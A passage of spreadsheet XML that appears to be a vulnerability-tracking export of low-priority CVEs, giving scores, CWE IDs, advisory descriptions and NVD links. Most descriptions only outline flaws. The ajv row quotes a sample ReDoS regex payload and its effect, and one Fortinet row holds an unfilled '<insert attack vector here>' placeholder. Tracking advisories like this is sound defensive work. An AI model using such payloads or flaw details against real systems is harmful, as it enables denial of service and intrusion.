          <t>CWE-352</t>
        </is>
      </c>
      <c r="L2233"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M2233" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76961</t>
        </is>
      </c>
    </row>
    <row r="2234">
      <c r="A2234" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2234" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17483</t>
        </is>
      </c>
      <c r="C2234" s="5" t="n">
        <v>3.3</v>
      </c>
      <c r="D2234" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E2234" s="5" t="inlineStr"/>
      <c r="F2234" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2234" s="5" t="inlineStr">
        <is>
          <t>ibm, db2</t>
        </is>
      </c>
      <c r="H2234" s="5" t="inlineStr">
        <is>
          <t>ibm:db2_mirror_for_i</t>
        </is>
      </c>
      <c r="I2234" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2234" s="5" t="inlineStr"/>
      <c r="K2234" s="5" t="inlineStr">
        <is>
          <t>CWE-285</t>
        </is>
      </c>
      <c r="L2234" s="5" t="inlineStr">
        <is>
          <t>IBM Db2 Mirror for i 7.4, 7.5, and 7.6 IBM i could allow a local attacker to delete historical flight-recorder archives due to improper access control in an SQL procedure.</t>
        </is>
      </c>
      <c r="M2234" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17483</t>
        </is>
      </c>
    </row>
    <row r="2235">
      <c r="A2235" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2235" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28582</t>
        </is>
      </c>
      <c r="C2235" s="5" t="n">
        <v>3.3</v>
      </c>
      <c r="D2235" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E2235" s="5" t="inlineStr"/>
      <c r="F2235" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2235" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2235" s="5" t="inlineStr"/>
      <c r="I2235" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2235" s="5" t="inlineStr"/>
      <c r="K2235" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L2235" s="5" t="inlineStr">
        <is>
          <t>In onCreate of ConfirmDeviceCredentialActivity.java, there is a possible unauthorized access to and modification of device credentials due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2235" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28582</t>
        </is>
      </c>
    </row>
    <row r="2236">
      <c r="A2236" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2236" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28622</t>
        </is>
      </c>
      <c r="C2236" s="5" t="n">
        <v>3.3</v>
      </c>
      <c r="D2236" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E2236" s="5" t="inlineStr"/>
      <c r="F2236" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2236" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2236" s="5" t="inlineStr"/>
      <c r="I2236" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2236" s="5" t="inlineStr"/>
      <c r="K2236" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L2236" s="5" t="inlineStr">
        <is>
          <t>In getQueryBuilderInternal of MediaProvider.java, there is a possible way to retrieve location metadata due to a permissions bypass. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2236" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28622</t>
        </is>
      </c>
    </row>
    <row r="2237">
      <c r="A2237" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2237" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28623</t>
        </is>
      </c>
      <c r="C2237" s="5" t="n">
        <v>3.3</v>
      </c>
      <c r="D2237" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E2237" s="5" t="inlineStr"/>
      <c r="F2237" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2237" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2237" s="5" t="inlineStr"/>
      <c r="I2237" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2237" s="5" t="inlineStr"/>
      <c r="K2237" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L2237" s="5" t="inlineStr">
        <is>
          <t>In writeToParcel of BleRssiRangingCapabilities.java, there is a possible way to obtain the Bluetooth MAC address due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2237" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28623</t>
        </is>
      </c>
    </row>
    <row r="2238">
      <c r="A2238" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2238" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28638</t>
        </is>
      </c>
      <c r="C2238" s="5" t="n">
        <v>3.3</v>
      </c>
      <c r="D2238" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E2238" s="5" t="inlineStr"/>
      <c r="F2238" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2238" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2238" s="5" t="inlineStr"/>
      <c r="I2238" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2238" s="5" t="inlineStr"/>
      <c r="K2238" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L2238" s="5" t="inlineStr">
        <is>
          <t>In multiple functions of XmpDataParser.java, there is a possible improper data sanitization due to a logic error in the code. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2238" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28638</t>
        </is>
      </c>
    </row>
    <row r="2239">
      <c r="A2239" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2239" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28671</t>
        </is>
      </c>
      <c r="C2239" s="5" t="n">
        <v>3.3</v>
      </c>
      <c r="D2239" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E2239" s="5" t="inlineStr"/>
      <c r="F2239" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2239" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2239" s="5" t="inlineStr"/>
      <c r="I2239" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2239" s="5" t="inlineStr"/>
      <c r="K2239" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="L2239" s="5" t="inlineStr">
        <is>
          <t>In updateInternal of MediaProvider.java, there is a possible expose contents of files due to a race condition. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2239" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28671</t>
        </is>
      </c>
    </row>
    <row r="2240">
      <c r="A2240" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2240" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45521</t>
        </is>
      </c>
      <c r="C2240" s="5" t="n">
        <v>3.3</v>
      </c>
      <c r="D2240" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E2240" s="5" t="inlineStr"/>
      <c r="F2240" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2240" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2240" s="5" t="inlineStr"/>
      <c r="I2240" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2240" s="5" t="inlineStr"/>
      <c r="K2240" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="L2240" s="5" t="inlineStr">
        <is>
          <t>In openFile of AppFuseBridge.java, there is a possible information disclosure due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2240" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45521</t>
        </is>
      </c>
    </row>
    <row r="2241">
      <c r="A2241" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2241" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59326</t>
        </is>
      </c>
      <c r="C2241" s="5" t="n">
        <v>3.3</v>
      </c>
      <c r="D2241" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E2241" s="5" t="inlineStr"/>
      <c r="F2241" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2241" s="5" t="inlineStr">
        <is>
          <t>spring</t>
        </is>
      </c>
      <c r="H2241" s="5" t="inlineStr">
        <is>
          <t>broadcom:spring_tools</t>
        </is>
      </c>
      <c r="I2241" s="5" t="inlineStr">
        <is>
          <t>2026-07-30</t>
        </is>
      </c>
      <c r="J2241" s="5" t="inlineStr"/>
      <c r="K2241" s="5" t="inlineStr">
        <is>
          <t>CWE-532</t>
        </is>
      </c>
      <c r="L2241" s="5" t="inlineStr">
        <is>
          <t>The Spring Boot language server logs the raw value of the https_proxy/HTTPS_PROXY/http_proxy/HTTP_PROXY environment variable at INFO level whenever it creates an outbound HTTP client and no explicit http.proxy workspace setting is configured. Corporate proxy URLs frequently embed Basic-auth credentials in the form http://user:pass@proxy:8080, and the language server writes this value to its log file without any redaction. Since language server log files are often attached to bug reports or are readable by other local users/processes, this can result in disclosure of proxy credentials.
Affected Spring Products and Versions:
Spring Tools for Eclipse: 5.2.0 and earlier
Spring Tools for VSCode / Cursor / Theia: 2.2.0 and earlier</t>
        </is>
      </c>
      <c r="M2241" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59326</t>
        </is>
      </c>
    </row>
    <row r="2242">
      <c r="A2242" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2242" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86503</t>
        </is>
      </c>
      <c r="C2242" s="5" t="n">
        <v>3.3</v>
      </c>
      <c r="D2242" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E2242" s="5" t="inlineStr"/>
      <c r="F2242" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2242" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="H2242" s="5" t="inlineStr"/>
      <c r="I2242" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J2242" s="5" t="inlineStr"/>
      <c r="K2242" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L2242" s="5" t="inlineStr">
        <is>
          <t>In JetBrains IntelliJ IDEA before 2026.2.2 opening an untrusted project could trigger SSRF via Kubernetes spec-source URL fetching</t>
        </is>
      </c>
      <c r="M2242" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86503</t>
        </is>
      </c>
    </row>
    <row r="2243">
      <c r="A2243" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2243" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28652</t>
        </is>
      </c>
      <c r="C2243" s="5" t="n">
        <v>3.1</v>
      </c>
      <c r="D2243" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E2243" s="5" t="inlineStr"/>
      <c r="F2243" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2243" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2243" s="5" t="inlineStr"/>
      <c r="I2243" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2243" s="5" t="inlineStr"/>
      <c r="K2243" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L2243" s="5" t="inlineStr">
        <is>
          <t>In multiple functions of RangingServiceImpl.java, there is a possible MITM due to a missing permission check. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2243" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28652</t>
        </is>
      </c>
    </row>
    <row r="2244">
      <c r="A2244" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2244" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70600</t>
        </is>
      </c>
      <c r="C2244" s="5" t="n">
        <v>3.1</v>
      </c>
      <c r="D2244" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E2244" s="5" t="inlineStr"/>
      <c r="F2244" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2244" s="5" t="inlineStr">
        <is>
          <t>windows, java</t>
        </is>
      </c>
      <c r="H2244" s="5" t="inlineStr"/>
      <c r="I2244" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J2244" s="5" t="inlineStr"/>
      <c r="K2244" s="5" t="inlineStr">
        <is>
          <t>CWE-1021</t>
        </is>
      </c>
      <c r="L2244" s="5" t="inlineStr">
        <is>
          <t>Electron is a framework for writing cross-platform desktop applications using JavaScript, HTML and CSS. Prior to 39.8.8, 40.9.0, 41.2.1, and 42.0.0-beta.3, the native autofill popup could be positioned by a cross-origin iframe outside that iframe's bounds, over the embedding page's UI, enabling clickjacking or spoofing of trusted UI. Apps are only affected if they embed untrusted content in iframes within windows that also display trusted UI. Apps that do not embed untrusted third-party content are not affected. This issue is fixed in versions 39.8.8, 40.9.0, 41.2.1, and 42.0.0-beta.3.</t>
        </is>
      </c>
      <c r="M2244" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70600</t>
        </is>
      </c>
    </row>
    <row r="2245">
      <c r="A2245" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2245" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84389</t>
        </is>
      </c>
      <c r="C2245" s="5" t="n">
        <v>3.1</v>
      </c>
      <c r="D2245" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E2245" s="5" t="inlineStr"/>
      <c r="F2245" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2245" s="5" t="inlineStr">
        <is>
          <t>fortinet</t>
        </is>
      </c>
      <c r="H2245" s="5" t="inlineStr"/>
      <c r="I2245" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2245" s="5" t="inlineStr"/>
      <c r="K2245" s="5" t="inlineStr">
        <is>
          <t>CWE-601</t>
        </is>
      </c>
      <c r="L2245" s="5" t="inlineStr">
        <is>
          <t>A url redirection to untrusted site ('open redirect') vulnerability in Fortinet FortiSIEM 7.5.0 through 7.5.1, FortiSIEM 7.4.1 through 7.4.2 may allow attacker to execute unauthorized code or commands via &lt;insert attack vector here&gt;</t>
        </is>
      </c>
      <c r="M2245" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84389</t>
        </is>
      </c>
    </row>
    <row r="2246">
      <c r="A2246" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2246" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-69873</t>
        </is>
      </c>
      <c r="C2246" s="5" t="n">
        <v>2.9</v>
      </c>
      <c r="D2246" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E2246" s="5" t="inlineStr"/>
      <c r="F2246" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2246" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2246" s="5" t="inlineStr"/>
      <c r="I2246" s="5" t="inlineStr">
        <is>
          <t>2026-02-11</t>
        </is>
      </c>
      <c r="J2246" s="5" t="inlineStr"/>
      <c r="K2246" s="5" t="inlineStr">
        <is>
          <t>CWE-1333, CWE-400</t>
        </is>
      </c>
      <c r="L2246" s="5" t="inlineStr">
        <is>
          <t>ajv (Another JSON Schema Validator) before 8.18.0 is vulnerable to Regular Expression Denial of Service (ReDoS) when the $data option is enabled. The pattern keyword accepts runtime data via JSON Pointer syntax ($data reference), which is passed directly to the JavaScript RegExp() constructor without validation. An attacker can inject a malicious regex pattern (e.g., "^(a|a)*$") combined with crafted input to cause catastrophic backtracking. A 31-character payload causes approximately 44 seconds of CPU blocking, with each additional character doubling execution time. This enables complete denial of service with a single HTTP request against any API using ajv with $data: true for dynamic schema validation. This issue is also fixed in version 6.14.0.</t>
        </is>
      </c>
      <c r="M2246" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-69873</t>
        </is>
      </c>
    </row>
    <row r="2247">
      <c r="A2247" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2247" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86231</t>
        </is>
      </c>
      <c r="C2247" s="5" t="n">
        <v>2.9</v>
      </c>
      <c r="D2247" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E2247" s="5" t="inlineStr"/>
      <c r="F2247" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2247" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2247" s="5" t="inlineStr"/>
      <c r="I2247" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J2247" s="5" t="inlineStr"/>
      <c r="K2247" s="5" t="inlineStr">
        <is>
          <t>CWE-298, CWE-299</t>
        </is>
      </c>
      <c r="L2247" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in mwiede jsch up to 2.28.5. Affected is the function getRevokedKeys of the file src/main/java/com/jcraft/jsch/KnownHosts.java. Performing a manipulation of the argument known_hosts results in improper check for certificate revocation. The attack is possible to be carried out remotely. The attack is considered to have high complexity. The exploitability is told to be difficult. The exploit has been released to the public and may be used for attacks. Upgrading to version 2.28.6 is able to address this issue. The patch is named 194a2f76a5c0f1c3f778565be3fd66bcafc42d23. You should upgrade the affected component.</t>
        </is>
      </c>
      <c r="M2247" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86231</t>
        </is>
      </c>
    </row>
    <row r="2248">
      <c r="A2248" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2248" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70430</t>
        </is>
      </c>
      <c r="C2248" s="5" t="n">
        <v>2.7</v>
      </c>
      <c r="D2248" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E2248" s="5" t="inlineStr"/>
      <c r="F2248" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2248" s="5" t="inlineStr">
        <is>
          <t>jenkins</t>
        </is>
      </c>
      <c r="H2248" s="5" t="inlineStr">
        <is>
          <t>jenkins:jenkins</t>
        </is>
      </c>
      <c r="I2248" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J2248" s="5" t="inlineStr"/>
      <c r="K2248" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L2248" s="5" t="inlineStr">
        <is>
          <t>Jenkins 2.575 and earlier, LTS 2.568.1 and earlier does not restrict the types of objects that can be instantiated as part of the project naming strategy configuration, allowing attackers with Overall/Manage permission to instantiate arbitrary types related to configuration, including those intended for configuration only by administrators.</t>
        </is>
      </c>
      <c r="M2248" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70430</t>
        </is>
      </c>
    </row>
    <row r="2249">
      <c r="A2249" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2249" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84392</t>
        </is>
      </c>
      <c r="C2249" s="5" t="n">
        <v>2.7</v>
      </c>
      <c r="D2249" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E2249" s="5" t="inlineStr"/>
      <c r="F2249" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2249" s="5" t="inlineStr">
        <is>
          <t>fortinet</t>
        </is>
      </c>
      <c r="H2249" s="5" t="inlineStr"/>
      <c r="I2249" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2249" s="5" t="inlineStr"/>
      <c r="K2249" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="L2249" s="5" t="inlineStr">
        <is>
          <t>A NULL Pointer Dereference vulnerability [CWE-476] vulnerability in Fortinet FortiOS 7.4 all versions, FortiOS 7.2 all versions, FortiPAM 1.9.0, FortiPAM 1.8 all versions, FortiPAM 1.7 all versions, FortiPAM 1.6 all versions, FortiPAM 1.5 all versions, FortiPAM 1.4 all versions, FortiPAM 1.3 all versions, FortiPAM 1.2 all versions, FortiPAM 1.1 all versions, FortiPAM 1.0 all versions, FortiProxy 7.6.0 through 7.6.6, FortiProxy 7.4 all versions, FortiProxy 7.2 all versions may allow an authenticated attacker to crash the httpsd daemon via crafted HTTP requests.</t>
        </is>
      </c>
      <c r="M2249" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84392</t>
        </is>
      </c>
    </row>
    <row r="2250">
      <c r="A2250" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2250" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87525</t>
        </is>
      </c>
      <c r="C2250" s="5" t="n">
        <v>2.7</v>
      </c>
      <c r="D2250" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E2250" s="5" t="inlineStr"/>
      <c r="F2250" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2250" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H2250" s="5" t="inlineStr">
        <is>
          <t>google:chrome, microsoft:windows</t>
        </is>
      </c>
      <c r="I2250" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2250" s="5" t="inlineStr"/>
      <c r="K2250" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L2250" s="5" t="inlineStr">
        <is>
          <t>Out of bounds read in Chromoting in Google Chrome on on Windows prior to 153.0.8010.36 allowed a local attacker to read memory outside the sandbox via a local program. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M2250" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87525</t>
        </is>
      </c>
    </row>
    <row r="2251">
      <c r="A2251" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2251" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-0303</t>
        </is>
      </c>
      <c r="C2251" s="5" t="n">
        <v>2.4</v>
      </c>
      <c r="D2251" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E2251" s="5" t="inlineStr"/>
      <c r="F2251" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2251" s="5" t="inlineStr">
        <is>
          <t>palo alto</t>
        </is>
      </c>
      <c r="H2251" s="5" t="inlineStr"/>
      <c r="I2251" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2251" s="5" t="inlineStr"/>
      <c r="K2251" s="5" t="inlineStr">
        <is>
          <t>CWE-829</t>
        </is>
      </c>
      <c r="L2251" s="5" t="inlineStr">
        <is>
          <t>A code execution vulnerability in Palo Alto Networks Checkov by Prisma® Cloud can allow arbitrary code execution when Checkov scans a directory that contains an attacker-controlled configuration file.</t>
        </is>
      </c>
      <c r="M2251" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-0303</t>
        </is>
      </c>
    </row>
    <row r="2252">
      <c r="A2252" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2252" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15418</t>
        </is>
      </c>
      <c r="C2252" s="5" t="n">
        <v>2.4</v>
      </c>
      <c r="D2252" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E2252" s="5" t="inlineStr"/>
      <c r="F2252" s="5" t="inlineStr"/>
      <c r="G2252" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2252" s="5" t="inlineStr"/>
      <c r="I2252" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2252" s="5" t="inlineStr"/>
      <c r="K2252" s="5" t="inlineStr">
        <is>
          <t>CWE-130</t>
        </is>
      </c>
      <c r="L2252" s="5" t="inlineStr">
        <is>
          <t>In the silabser.sys driver for CP210x devices v11.5.0 and earlier, a local unprivileged user with a malicious device can use malformed packets to leak up to 145 bytes of uninitialized kernel pool memory. This vulnerability affects Windows 10 and earlier.</t>
        </is>
      </c>
      <c r="M2252" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15418</t>
        </is>
      </c>
    </row>
    <row r="2253">
      <c r="A2253" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2253" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71438</t>
        </is>
      </c>
      <c r="C2253" s="5" t="n">
        <v>2.4</v>
      </c>
      <c r="D2253" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E2253" s="5" t="inlineStr"/>
      <c r="F2253" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2253" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2253" s="5" t="inlineStr"/>
      <c r="I2253" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J2253" s="5" t="inlineStr"/>
      <c r="K2253" s="5" t="inlineStr">
        <is>
          <t>CWE-1321</t>
        </is>
      </c>
      <c r="L2253" s="5" t="inlineStr">
        <is>
          <t>Mermaid is a JavaScript tool that uses Markdown-inspired text to create and modify diagrams and charts. Prior to 10.9.8 and 11.16.1, Mermaid's configuration setters (mermaid.initialize, mermaidAPI.setConfig, and mermaidAPI.updateSiteConfig) merge caller-supplied configuration into Mermaid's internal config using the assignWithDepth deep-merge helper, which is vulnerable to prototype pollution. This is only exploitable if an application forwards untrusted data directly into one of these configuration entry points, which is outside their documented usage; diagram-supplied configuration (e.g. %%{init: {}}%% or YAML frontmatter) is not affected. This issue is fixed in versions 10.9.8 and 11.16.1.</t>
        </is>
      </c>
      <c r="M2253" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71438</t>
        </is>
      </c>
    </row>
    <row r="2254">
      <c r="A2254" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2254" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73087</t>
        </is>
      </c>
      <c r="C2254" s="5" t="n">
        <v>2.3</v>
      </c>
      <c r="D2254" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E2254" s="5" t="inlineStr"/>
      <c r="F2254" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2254" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H2254" s="5" t="inlineStr"/>
      <c r="I2254" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J2254" s="5" t="inlineStr"/>
      <c r="K2254" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L2254" s="5" t="inlineStr">
        <is>
